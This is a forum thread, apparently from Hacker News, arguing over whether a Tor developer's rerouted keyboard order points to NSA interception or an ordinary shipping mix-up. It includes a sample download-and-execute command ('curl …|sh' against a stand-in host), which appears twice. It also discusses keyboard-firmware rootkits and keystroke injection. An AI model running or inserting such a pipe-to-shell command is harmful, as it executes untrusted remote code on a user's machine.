Oh, I like this game. Let's play again: WHICH IS MORE LIKELY?!
* The world's largest online retailer that does $54M in sales per day has a bug in its procurement system that randomly transposes tracking codes.
ORRRRRRRR!
* The intelligence agency whose massive scope and pervasive operational shortcomings were recently exposed by one low-level operative had a slip-up in applying a well-publicized tactic to an obviously high value target.
On the other hand, what's great about your way of putting it is that it juxtaposes your belief in the all encompassing nature of the NSA's programs with your incredulity that such a program might have been applied specifically here. I also like the part where the NSA is guarded by the Catch-22 "it wasn't them, because if it was, you'd never know", such that that there's no scenario in which you could be convinced that the NSA did anything.
And yet again, maybe it's time to stop thinking of the NSA as some far-off abstraction and start thinking about it is an actual thing that affects our daily lives.
I don't understand. Richard's point doesn't depend on an Amazon bug that transposes tracking codes. But your point does depend on the NSA redirecting packages to Alexandria in such a way that anyone who checked their order status would notice.
Why do you think NSA cares much about hiding their activities from you?
I can tell you a story. Some years ago, back in Russia, as a [naive] kid, I've developed a surveillance system for Telrad telecom exchange [ultimately for FSB]. Do you think anyone cared to do that project in secrecy? I can give you the answer. Nope.
As far as I understand NSA can legally intercept packages and can legally install undetectable surveillance devices. As long as they are not using collected surveillance data, legally they are fine and they do not absolutely have to hide their activities at all costs. Hiding large scale operation is difficult and plugging every information leak is expensive. So they are not necessarily prioritizing that. So, yes, there is a change that we simply see their activity. And yes, it could be just an Amazon bug.
During the cold war (and shortly after), this type of activity would be exactly what red-blooded Americans would say differentiated us from Russia (not hiding it, but doing it at all). Americans have constitutional protection against unreasonable search and seizure by the government.
These days you could probably drop the country and year and have trouble differentiating tactics used by the US and Russia.
It's going after low-hanging fruit to say this and while the link I'm providing is not the NSA, our government agencies seem to have a real hard time keeping secrets lately.
Part of this discussion seems based on a lack of understanding of the geography of the DC area. Alexandria is near these agencies, omg! But the fact is that there isn't much government in Alexandria. USPTO is there, and otherwise it's charming old houses, quirky shops, crappy strip malls, cookie-cutter suburbia, smallish high-rise apartments, railroad facilities, light industry, and other such similar things.
It's roughly like seeing your Mac get misdelivered to Richmond, CA and deciding that holy crap it's been intercepted by Apple on its way to me.
You're using public sources of information to refute theories of where a highly-secret and officially-denied program might operate. That makes no sense.
Whatever office, department, or contractor does the NSA's package intercepts, all public sources will describe it as something innocent and unrelated.
The guy I responded to is using that some information to try to support the theories. Either the info is good, or it's not.
I have no particular objection to saying, "this stuff would be secret so of course there would be no information on it". Oddly, nobody has actually tried that.
However, that still goes back to the point I raised: why Alexandria? It's not particularly convenient to the NSA. It's not convenient to shippers. It doesn't have anything special in the way of infrastructure. So it would be quite an odd choice. Possible, but it's not the smoking gun the article makes it out to be.
I specifically stated that I was just trying to point out that, despite your claim, there's something interesting in Alexandria.
There's no point in debating speculations beyond that because we don't have any information for or against.
It's just me stating "hey, it's possible" and refuting your suggestion that there isn't anything in Alexandria that could cause concern. I'm only answering a question you asked.
Yes, one part of what they do is in NJ/CA. Alexandria is where they're based. I'm not leaping to any conclusion; it just seems remotely possible and they're based there. You're the one saying there's nothing interesting in Alexandria.
Given what the company researches, their history and mission, it seems like exactly the sort of place where this wild theory suggested by the OP could be a reality.
The headquarters of a company like this isn't interesting. Headquarters are administrative centers. It's not where you send a laptop to have a bug installed.
I'll have to be explicit since this seems hard to understand:
You're the NSA. Who do you trust more:
A) (Perhaps the) CTO of a defense contractor that only works for you that you've had a 20 year working relationship with?
B) The bright eyed young scientists working for that contractor in a building 3000 miles away?
Or put another way, despite the Snowden leak, I'll bet you any amount of money that the NSA is still in "really fucking tight" with Booz Allen Hamilton.
In one paragraph, you seem to be saying that the NSA wouldn't trust the employees of contractors. In the next paragraph, you tell me that the NSA is still "really fucking tight" with Booz Allen. These two ideas seem completely contradictory.
But I think you might be suggesting that the NSA has given up on the low-level employees, and is now having the executives of these companies do the work directly. Which seems completely ludicrous to me, as no C-level at a company like this (even the CTO) is going to have the requisite skills, and even if he did he's not going to have the time.
You think along the narrowest lines of anyone of anyone I've ever held a conversation with.
Not executives specifically but somebody trusted. That's more likely to be in the building where administration is done than anywhere else. Also you want to separate research from implementation. Your narrow refusal to even consider that there might be an interesting place for an agency to ship a laptop component to in Alexandria has taken this exercise way further than it needs to be to demonstrate the point.
What you see of narrow thinking is just complete disagreement on how companies like this are structured.
For example, I live a couple of miles from the headquarters of Exxon Mobil. Yet it's about the last place I'd look if I wanted to find a trustworthy person to drill an oil well or build a gas pipeline.
Also, I'm not refusing to consider that Alexandria might be a viable destination for this. I merely think it's unlikely, especially compared to the "military and intelligence belt" language used in the post.
No one thinks redirection would be visible to 'anyone'. The theory is thhis could be a one-time screw-up, like a redaction failure, revealing a waypoint that was supposed to be secret. (Maybe a label that was supposed to go on the outer box went on the inner box instead?)
I'd agree an innocent screw-up is far more likely, here and in any particular case where something weird happens. Weird stuff happens with shipping all the time.
But since we know shipment interception is part of the NSA toolkit, and the NSA cares about Tor, people aren't crazy to be curious and even paranoid around remote possibilities. And if I were a Tor developer, I might buy all my hardware from store shelves with cash.
No, he's saying that anyone who checked their order status shouldn't notice (by design), but maybe that part of the process failed this time.
Also, that failure might be technical or intentional. As I mentioned on another subthread, it's always possible this was "accidentally" exposed by an employee working at the merchant or postal service. The program would require their cooperation. After all, we first learned about the telco spying because telco employees spoke up.
As for whether it's conceivable that NSA would target a Tor developer? A few months they were spying on our close friends and allies simply because they could. If that same mindset were applied to the intercept program, then this isn't impossible to imagine. Just because the NSA and administration has finally recognized their overreach and has started backpedalling doesn't mean these programs change overnight.
It is difficult to predict NSA actions, but opportunistically putting up inexpensive surveillance on all Tor users and nodes seems like a reasonable thing to do. As a developer she is a Tor user and also probably operates a few Tor nodes [for debugging and testing purposes]. So she would be in that group. I think this is plausible. I doubt that NSA would specifically target a Tor developer in US, without court order, as this would probably be illegal. [Although subverting some Tor developers, especially ones who build Tor binaries would be useful.]
The intelligence agency whose massive scope and pervasive operational shortcomings were recently exposed by one low-level operative had a slip-up in applying a well-publicized tactic to an obviously high value target.
A few comments:
• This "low-level operative" was a system administrator who used social engineering to obtain other people's authentication credentials and gain access to material to which he wasn't authorized. He wasn't the janitor or some clueless field agent.
• Did Snowden expose operational shortcomings? Absolutely. A lot of the programs that have been publicly revealed through his leaks have been running for over a decade without ever seeing the light of day, though. That tells me these "pervasive operational shortcomings" aren't very pervasive. (If they were, the NSA would be absolute shit at their mission.)
• I don't think Andrea is a "high value target," or at least high value enough to risk compromising whatever method they might use to bug her keyboard. I don't say this to belittle her or her work in any way — she seems to be a skilled programmer/hacker/infosec person. And that's exactly why this whole "the NSA is bugging her keyboard" theory doesn't make any sense.
Let's assume for the sake of argument that the NSA had planned to bug her keyboard, and that keyboard is now sitting in an NSA (or contractor) facility in/near Alexandria, Virginia, waiting for some modification to be made before shipping it back out. But, oops, they screwed up and forgot to fake the USPS tracking information. They know she knows because she tweeted about it. She's also tweeted that she can never trust the keyboard if/when it shows up. Why would they ship her a bugged keyboard at this point? If/when the keyboard shows up, she's probably going to take it apart and share anything interesting she finds with the world. There will be hard evidence.
Even if they hadn't bungled the tracking information in our hypothetical argument, they're risking exposure of the exact methods they use to bug a machine for not much potential gain. (Remember, Andrea's a skilled hacker/programmer. There's a very good chance she'll figure out what's going on and tell the world if she has any inkling that her laptop's been tampered with.)
• The keyboard she ordered fits a ThinkPad T60/T61/T400/T500 (and the equivalent "R" models, plus a few others). Internally, the keyboard and TrackPoint speak PS/2. While they could log keystrokes to an on-board chip and transmit keystrokes via radio, there aren't any especially interesting things the NSA can do to her laptop via a modified keyboard. They certainly won't be rooting it that way.
• I said that I don't think Andrea is a "high value target," despite her work on Tor, because everything about Tor is open. Anyone can download the code and see exactly how it works. The protocol is well-known. There's no curtain to peek behind and gain strategic information about Tor's workings.
So while I don't reject the argument that the NSA is trying to bug her laptop as impossible, I think it's exceedingly improbable. My money's still on "seller screwed up the tracking number."
I also like the part where the NSA is guarded by the Catch-22 "it wasn't them, because if it was, you'd never know", such that that there's no scenario in which you could be convinced that the NSA did anything.
The flip side of this argument, which everyone here seems to be clutching onto and running with, is that if the NSA is capable of it, they're doing it at every available opportunity, even when it doesn't make any sense to.
> Internally, the keyboard and TrackPoint speak PS/2. While they could log keystrokes to an on-board chip and transmit keystrokes via radio, there aren't any especially interesting things the NSA can do to her laptop via a modified keyboard. They certainly won't be rooting it that way.
This is a joke, right? A keyboard and a keylogger would give you everything you need to root a computer.
My point was that the modified keyboard alone couldn't do it. It's not a FireWire device that can read/write things from/to memory however it pleases, insta-pwning a computer as soon as it's connected (unless something like VT-d is being used to contain DMA transfers). It's not even a USB device that could abuse some poorly written driver to gain access.
If a hypothetical modified keyboard is logging keystrokes, someone has to eventually retrieve it to get the logged data. If it's transmitting keystrokes via radio, someone has to be nearby to capture them and then steal the laptop to get at its (presumably encrypted) data.
Why when a shell is focused? Better to wait until the keyboard has been idle for some time, then send the keystrokes to open a shell, execute the needed commands, and close it afterward.
Here's a fun thought exercise for you, since my first reply didn't spark one. Imagine you're an evil keyboard. What evil could you accomplish? Hint: you don't even need your own radio, the computer's already got one.
"we describe how to tamper with a firmware upgrade
to the Apple Aluminum Keyboard. We describe
how an attacker can subvert an off-the-shelf keyboard by
embedding into the firmware malicious code which allows
a rootkit to survive a clean re-installation of the host
operating system."
DMA via FireWire (or Thunderbolt or similar) allows you to very quickly poke at system memory with a near-zero risk of being detected.
An autonomously malicious PS/2 keyboard, on the other hand, is on the end of a slow (~12 kbit/s) serial interface. It can only simulate keypresses and receive updates about the keyboard LEDs' statuses. It doesn't know the current state of the system. It's as likely to type "curl http://innocent-looking.org/logo.jpg|sh" in a text editor as it is at a command prompt, so it can't type anything autonomously without running the (huge) risk of alerting its owner to its presence.
Edit: The "Reversing and exploiting an Apple firmware update" paper linked below talks about persisting a rootkit on a computer by using Spotlight to open Terminal, then typing a command to download and execute a payload. That runs the same risk of alerting the user to its presence, and it will completely fail if the user has remapped Cmd-Space to something else.
I would speculate that they might be interested in submitting a patch that compromises the Tor network in some subtle way that only they can exploit, and doing it in her name. Maybe added on to some other big change she submitted, in the hope that nobody will notice it.
Seems the Tor project is using Git for all of their projects, so doing something like that would probably require pwning whatever system she's creating commits on. I will say that putting a bug or something in her keyboard doesn't seem like a terribly efficient way of doing this.
I don't really think that they're trying to break Tor like this. More of a thought experiment - to figure out the likelihood that this is part of an attempt to break Tor, run through the details of exactly how this would be part of such an attempt. It doesn't sound all that practical when you run though how it would work if it was. If they wanted to do it, you'd think they have better ways then a rather sloppy attempt to intercept a laptop keyboard shipment, if that's actually what this was, instead of an ordinary shipment screw-up.
All good points, and I'd second that Andrea is unlikely to be a "high value target" [BTW, curious, who is building and releasing Tor binaries and Tor dependencies binaries?]. Still, as a developer she is a Tor user and it is possible that NSA opportunistically targets all Tor users. And even if not, I'm still finding it distasteful that NSA can legally intercept post and put up dragnet surveillance. It feels like they are using legal loopholes too. Not fair.
That generated more response than I expected. I actually do agree that, on balance, it's somewhat more likely that it's just a benign glitch; I should have said that. What I was really taking issue with is the dismissiveness with you treated the suggestion that this might be an NSA attack. I was responding to what I saw as a slanted and unreasonable framing by doing the same thing from the other end.
So with less snark: I don't think it's exceedingly improbable at all, and whether ultimately it turns out to be the case or not, smugly guffawing the idea that the NSA may have used a trick like that isn't warranted. They really do intercept people's laptop shipments [1] to plant malware in them. They really do sneak tiny radio transmitters into end-user hardware. They really are trying to get backdoors into communication tools. I'll put it this way: if I worked on the kind of software Andrea works on, I would be seriously alarmed. Would you keep the keyboard?
On some specific points you made:
* That Snowden had access to other people's credentials seems like a serious operational shortcoming to me. The "low-level" part wasn't an attack on Snowden; the point is that a lot of people have that level of access. In general, the US intelligence apparatus makes a lot of well-publicized mistakes; I'm sure they make a great number of more subtle ones.
* On the NSA's shortcomings generally, I think this is actually nicely illustrative. Because a lot of the stuff Snowden revealed were things a lot of credible people already believed, based on things like weird locked server closets in telecom buildings and PRNGs that seemed fishy and pointless and heresay reports of requests for backdoor access to communication tools and so on. There was just little hard evidence before Snowden. And there won't be here either. So this is entirely consistent with the what the NSA was like in those decades where their programs "never saw the light of day".
* I think being a core Tor developer makes her high value target. It's hard to imagine the NSA wanting to subvert all the things it's subverted and not wanting to backdoor Tor. Keylogging her keyboard is a great way to do that, either by compromising her somehow, or by just stealing her credentials. So I don't follow the "it doesn't make any sense" line of thinking.
* That she's now tweeted about certainly makes it unlikely that, if the NSA has it, they'll go through with sending it bugged. But so?
Where I come out on this is that yes, it's probably nothing, but it should be treated with suspicion and carefulness, not laughed off because haha, what, do you think you're in a spy movie or something? Because, basically, we are.
[1] Yes, I know this is just the keyboard. I don't think that's a relevant difference.
What I was really taking issue with is the dismissiveness with you treated the suggestion that this might be an NSA attack. I was responding to what I saw as a slanted and unreasonable framing by doing the same thing from the other end.
I was dismissing the linked blog post as much as the suggestion of NSA involvement. The blog post took a single tweet with a single screenshot, screwed up half the facts ("tracking details for a computer Shepard ordered" — uh, no, it was a used laptop keyboard), sensationalized the other half ("it moved another four times around the military and industrial belt" — uh, no, it moved from IAD to Alexandria), and tacked a pile of rhetorical questions and conjecture on the end.
a couple weeks ago, my wife received an order from Banana Republic that was intended for a recipient in Newfoundland. the correct recipient's name was on the packlist inside the box but they showed it to the wrong person. likewise, my wife's actual offer took a few days longer to arrive, too. I suspect it was simple mistake inn the warehouse where an operator had two boxes, printed waybill stickers for both, and then slapped them on the wrong - already sealed - packages. I bet similar things happen regularly.
![http://innocent-looking.org/logo.jpg|sh"](http://innocent-looking.org/logo.jpg|sh"){kind=link}
* The world's largest online retailer that does $54M in sales per day has a bug in its procurement system that randomly transposes tracking codes.
ORRRRRRRR!
* The intelligence agency whose massive scope and pervasive operational shortcomings were recently exposed by one low-level operative had a slip-up in applying a well-publicized tactic to an obviously high value target.
On the other hand, what's great about your way of putting it is that it juxtaposes your belief in the all encompassing nature of the NSA's programs with your incredulity that such a program might have been applied specifically here. I also like the part where the NSA is guarded by the Catch-22 "it wasn't them, because if it was, you'd never know", such that that there's no scenario in which you could be convinced that the NSA did anything.
And yet again, maybe it's time to stop thinking of the NSA as some far-off abstraction and start thinking about it is an actual thing that affects our daily lives.